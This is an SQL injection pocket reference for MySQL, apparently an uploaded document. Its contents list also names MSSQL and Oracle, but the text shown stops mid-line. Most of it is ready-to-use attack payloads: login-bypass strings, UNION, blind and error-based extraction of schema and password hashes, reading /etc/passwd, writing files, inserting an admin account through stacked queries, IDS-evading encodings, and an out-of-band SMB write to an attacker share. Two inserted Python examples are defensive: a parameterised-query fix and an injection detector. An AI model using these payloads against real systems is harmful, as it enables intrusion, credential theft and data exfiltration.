SQL Injection Pocket Reference.docx
- Document number: 4776772
- Upload time: 2022-12-08
- Format: DOCX
- Pages: 26
- Size: 26.38KB
SQL Injection Pocket Reference
1. MySQL
a. Default Databases
b. Comment Out Query
c. Testing Injection
i. Strings
ii. Numeric
iii. In a login
d. Testing Version
e. MySQL-specific code
f. Retrieving DB usernames/passwords
g. Tables & Columns
i. Finding out column #
ii. Retrieving Tables
iii. Retrieving Columns
iv. PROCEDURE ANALYSE()
v. Find Tables from Column Name
vi. Find Column From Table Name
h. Avoiding the use of single/double quotations
i. String concatenation
j. Privileges
k. FILE privilege
i. MySQL 4/5
ii. MySQL 5
l. Out Of Band Channeling
i. Timing
ii. DNS (requires FILE privilege)
iii. SMB (requires FILE privilege)
m. Reading Files (requires FILE privilege)
n. Writing Files (requires FILE privilege)
o. Stacked Queries with PDO
p. User Defined Functions
q. Fuzzing and Obfuscation
i. Allowed Intermediary Characters:
ii. Allowed Intermediary Characters after AND/OR
r. Operators
s. Constants
t. MySQL Functions()
u. MySQL Password Hashing (Taken from MySQL website)
v. MySQL Password() Cracker
w. MySQL < 4.1 Password Cracker
2. MSSQL
a. Default Databases
b. Comment Out Query
c. Testing Version
d. Retrieving usernames/passwords
e. Database Server Hostname
f. Listing Databases
g. Tables & Columns
i. Retrieving Tables
ii. Retrieving Columns
iii. Retrieving Multiple Tables/Columns at once
h. OPENROWSET Attacks
i. System Command Execution
j. SP_PASSWORD (Hiding Query)
k. Fuzzing and Obfuscation
i. Encodings
l. MSSQL Password Hashing
m. MSSQL Password Cracker
3. ORACLE
a. Default Databases
b. Comment Out Query
c. Testing Version
d. Retrieving Users/Passwords
e. Retrieving Databases
i. Current Database
ii. User Databases
f. Tables & Columns
i. Retrieving Tables
ii. Retrieving Columns
iii. Finding Tables from Column Name
iv. Finding Column From Table Name
g. Fuzzing and Obfuscation
i. Avoiding the use of single/double quotations
ii. Unlike other RDBMS, Oracle allows us to reference table/column names encoded.
h. Out Of Band Channeling
i. Time Delay
ii. Heavy Query Time delays
Credits
I would like to thank .mario, Reiners and everyone else who helped me put this together. You can reach me at for any suggestions you may have or if there's something you think should be on here. Remember this is still a work in progress.
MySQL
Default Databases
∙ mysql (Privileged)
∙ information_schema (Version >= 5)
Comment Out Query
∙ #
∙ /*
∙ -- -
∙ ;%00
Example:
' OR 1=1 -- -' ORDER BY id;
Testing Injection
∙ False
o The query is invalid (MySQL errors/missing content on website)
∙ True
o The query is valid (Content is displayed as usual)
Strings
∙ ' - False
∙ '' - True
∙ " - False
∙ "" - True
Numeric
∙ AND 0 - False
∙ AND 1 - True
∙ 2-1 - 1
∙ 3-2 - 1
In a login
∙ ' OR '1
∙ ' OR 1 -- -
∙ '='
∙ 'LIKE'
∙ '=0-- -
Example:
∙ SELECT * FROM Users WHERE username = 'Mike' AND password = ''=''
∙ " OR ""="
∙ " OR 1=1-- -
Example:
SELECT * FROM Users WHERE username = 'Mike' AND password = 'anypassword' OR ''=''
Note:
∙ You can use as many apostrophes/quotations as you want as long as they pair up
∙ SELECT * FROM Articles WHERE id = '121''''''''''''' - This is valid
∙ It's also possible to continue the statement after the chain of quotes:
SELECT '1'''''''"" UNION SELECT 2 # 1 and 2
∙ Quotes escape quotes:
SELECT '1''' # 1'
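Added example, not part of the reference: the login query above rebuilt in Python against an in-memory SQLite stand-in for the `Users` table, with the string-spliced form beside a parameterised one. The `' OR '1` and `' OR 1 -- -` inputs from the list pass the spliced check and fail the bound one; the table, the user `Mike` and the clear-text password are constructed sample data, and the function names are mine.

```python
import sqlite3

# Constructed in-memory stand-in for the reference's `Users` table (sample data only;
# the password is stored in clear purely to keep the example short).
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE Users (username TEXT, password TEXT)")
_db.execute("INSERT INTO Users VALUES ('Mike', 's3cret')")


def vulnerable_login(username: str, password: str) -> bool:
    """Flawed pattern: user-supplied values are spliced into the SQL text, so a
    password of  ' OR '1  turns the WHERE clause into ... AND password = '' OR '1'."""
    query = ("SELECT * FROM Users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return _db.execute(query).fetchone() is not None


def safe_login(username: str, password: str) -> bool:
    """Fix: bind parameters, so the driver hands the values over as data and a quote
    in the input can never close the literal or start a new clause."""
    query = "SELECT * FROM Users WHERE username = ? AND password = ?"
    return _db.execute(query, (username, password)).fetchone() is not None
```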
Testing Version
∙ VERSION();
∙ @@VERSION;
Example:
' AND MID(VERSION(),1,1) = '5 - True if MySQL version is 5
MySQL-specific code
MySQL allows you to specify the version number after the exclamation mark. The syntax within the comment is only executed if the version is greater or equal to the specified version number.
Example:
UNION SELECT /*!50000 5,null;%00x%A0*//*!40000 4,null-- ,*//*!30000 3,null-- x*/,null-- - (UNION with 2 columns)
Note:
∙ You can use comments in between the name and the parenthesis
∙ Example:
VERSION/**/()
∙ Output will contain -nt-log in case the DBMS runs on a Windows based machine
Retrieving DB usernames/passwords
∙ Database.Table:
mysql.user (Privileged)
∙ Columns:
user, password
∙ Current User:
user(), system_user()
Example:
∙ UNION SELECT CONCAT(user, 0x3A, password) FROM mysql.user WHERE user = 'root'
Tables & Columns
Finding out column #
∙ Order By:
o ORDER BY 1
o ORDER BY 2
o ORDER BY ...
Note:
Keep incrementing the number until you get a False response.
Example:
∙ 1' ORDER BY 1-- - True
∙ 1' ORDER BY 2-- - True
∙ 1' ORDER BY 3-- - True
∙ 1' ORDER BY 4-- - False (Only 3 Columns)
∙ -1' UNION SELECT 1,2,3-- -
∙ Error Based:
o AND (SELECT * FROM SOME_TABLE) = 1
o Operand should contain 3 column(s)
Note:
This works if you know the table name you're after and error showing is enabled
Retrieving Tables
∙ Union:
o UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version = 10;
∙ Blind:
o AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'
∙ Error:
o AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1) x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1), FLOOR(RAND(0)*2)))
Note:
∙ version = 9 for MySQL 4
∙ version = 10 for MySQL 5
Retrieving Columns
∙ Union:
o UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
∙ Blind:
o AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
∙ Error:
o AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1) x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1), FLOOR(RAND(0)*2)))
o AND (1,2,3) = (SELECT * FROM SOME_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1
∙ Procedure Analyse():
o Refer to PROCEDURE ANALYSE() below.
Note:
The GROUP_CONCAT() function allows grouping of the tables/columns, instead of viewing them one at a time.
Note:
∙ Output is limited to 1024 chars by default.
∙ All default database table names:
~900 chars
∙ All default database column names:
~6000 chars
PROCEDURE ANALYSE()
∙ 1 PROCEDURE ANALYSE() # get first column name
∙ 1 LIMIT 1,1 PROCEDURE ANALYSE() # get second column name
∙ 1 LIMIT 2,1 PROCEDURE ANALYSE() # get third column name
Note:
It is necessary that the web app will display the first selected column of the SQL query you are injecting into.
Find Tables from Column Name
∙ SELECT table_name FROM information_schema.columns WHERE column_name = 'username'; - Finds the table names for any columns named username.
∙ SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%'; - Finds the table names for any columns that contain the word user.
Find Column From Table Name
∙ SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';
∙ SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%';
Avoiding the use of single/double quotations
∙ UNION SELECT CONCAT(username, 0x3a, password) FROM Users WHERE username = 0x61646D696E
∙ UNION SELECT CONCAT(username, 0x3a, password) FROM Users WHERE username = CHAR(97,100,109,105,110)
String concatenation
∙ SELECT concat('a','a','a')
∙ SELECT 'a' 'a' 'a' a
∙ SELECT /*/'a'/*/'d'/*/'mi'/*/'n'
Privileges
FILE privilege
MySQL 4/5
∙ ' UNION SELECT file_priv,null FROM mysql.user WHERE user = 'username
∙ ' AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y
MySQL 5
∙ ' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%
∙ ' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1) = 'Y
Out Of Band Channeling
Timing
∙ BENCHMARK()
∙ SLEEP() (MySQL 5)
∙ IF(), (CASE() WHEN)
∙ '-(IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('test')), false))-'
DNS (requires FILE privilege)
∙ SELECT LOAD_FILE(concat('\\\\foo.',(select MID(version(),1,1)),'\\'));
SMB (requires FILE privilege)
∙ ' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt
Reading Files (requires FILE privilege)
∙ LOAD_FILE()
∙ UNION SELECT LOAD_FILE('/etc/passwd')-- -
Note:
∙ file must be located on the server host
∙ the base directory for load_file() is the @@datadir
∙ the file must be readable by the MySQL user
∙ the file size must be less than max_allowed_packet
∙ UNION SELECT @@max_allowed_packet (default value is 1047552 bytes)
Writing Files (requires FILE privilege)
∙ INTO OUTFILE/DUMPFILE
∙ AND 1=0 UNION SELECT 'code',null INTO OUTFILE '/tmp/file
Note:
∙ you can't overwrite files with INTO OUTFILE
∙ INTO OUTFILE must be the last statement in the query
∙ there is no way to encode the pathname, so quotes are required
Stacked Queries with PDO
Stacked queries are possible when PHP uses the PDO_MYSQL driver to make a connection to the database.
Example:
∙ AND 1=0; INSERT INTO Users (username, password, priv) VALUES ('BobbyTables', 'kl20da$$', 'admin');
User Defined Functions
Fuzzing and Obfuscation
Allowed Intermediary Characters:
∙ 09
∙ 10
∙ 0A
∙ 0B
∙ 0C
∙ 0D
∙ A0
Example:
'%0A%09UNION%0CSELECT%10NULL%23
∙ 28
∙ 29
Example:
union(select(column)from(table))
Note:
URL Encoding your injection can sometimes be useful for IDS evasion.
%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31
Allowed Intermediary Characters after AND/OR
∙ 2B
∙ 2D
∙ 7E
Example:
SELECT 1 FROM Test WHERE 1=1 AND -+-+-+-+~~((1))
$prefixes = array("", "+", "-", "~", "!", "@", "");
∙ 09
∙ 0A
∙ 0B
∙ 0D
∙ 0C
∙ 20
Example:
SELECT 1 FROM information_schema%20%0C%20.%20%09tables;
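Added example, not part of the reference: a Python normaliser for the detection side of the two "Allowed Intermediary Characters" lists above. It undoes URL encoding, the 09/10/0A/0B/0C/0D/A0 separators, parentheses, /* */ comments and the +-~! chains tolerated after AND/OR before matching, so a filter or log rule can recognise the reference's own obfuscated examples. The `normalize` and `classify` names, the two match rules and the sample inputs are mine and illustrative, not a complete detector.

```python
import re
from urllib.parse import unquote

# Bytes MySQL accepts between tokens (09 10 0A 0B 0C 0D A0 from the list above, plus
# a normal space); a detector has to treat every one of them as whitespace.
INTERMEDIARY = "\x09\x10\x0a\x0b\x0c\x0d\xa0\x20"
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)              # also eats /*!50000 ... */
PREFIX_RE = re.compile(r"\b(AND|OR)\s*[+\-~!]+", re.I)   # AND -+-+~~(1)  ->  AND (1)
UNION_SELECT_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b")
TAUTOLOGY_RE = re.compile(r"\b(?:AND|OR)\s+(?:'?\d+'?\s*=\s*'?\d+'?|'?1'?)\b")


def normalize(payload: str) -> str:
    """Canonicalise one request parameter the way a detector should before matching."""
    # Undo URL encoding twice to catch double encoding; latin-1 keeps %A0 as \xa0.
    text = unquote(unquote(payload, encoding="latin-1"), encoding="latin-1")
    # Drop comments, then turn every intermediary byte and parenthesis into a space.
    text = COMMENT_RE.sub(" ", text)
    text = text.translate({ord(c): " " for c in INTERMEDIARY + "()"})
    # Strip the +-~! chains MySQL tolerates after AND/OR (over-matches "AND -1"; fine
    # for a normaliser whose output is only used for matching).
    text = PREFIX_RE.sub(r"\1 ", text)
    # Collapse whitespace and upper-case so keyword matching is case-insensitive.
    return " ".join(text.split()).upper()


def classify(payload: str) -> set:
    """Return the names of the rules that fire on the normalised payload."""
    text = normalize(payload)
    findings = set()
    if UNION_SELECT_RE.search(text):
        findings.add("union-select")
    if TAUTOLOGY_RE.search(text):
        findings.add("tautology")
    return findings


# Constructed sample inputs: the reference's obfuscated forms plus one benign value.
SAMPLES = [
    "'%0A%09UNION%0CSELECT%10NULL%23",
    "union(select(column)from(table))",
    "%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31",
    "SELECT 1 FROM Test WHERE 1=1 AND -+-+-+-+~~((1))",
    "Mike",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", repr(normalize(sample)), sorted(classify(sample)))
```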
Operators
$operators = array("^", "=", "!=", "%", "/", "*",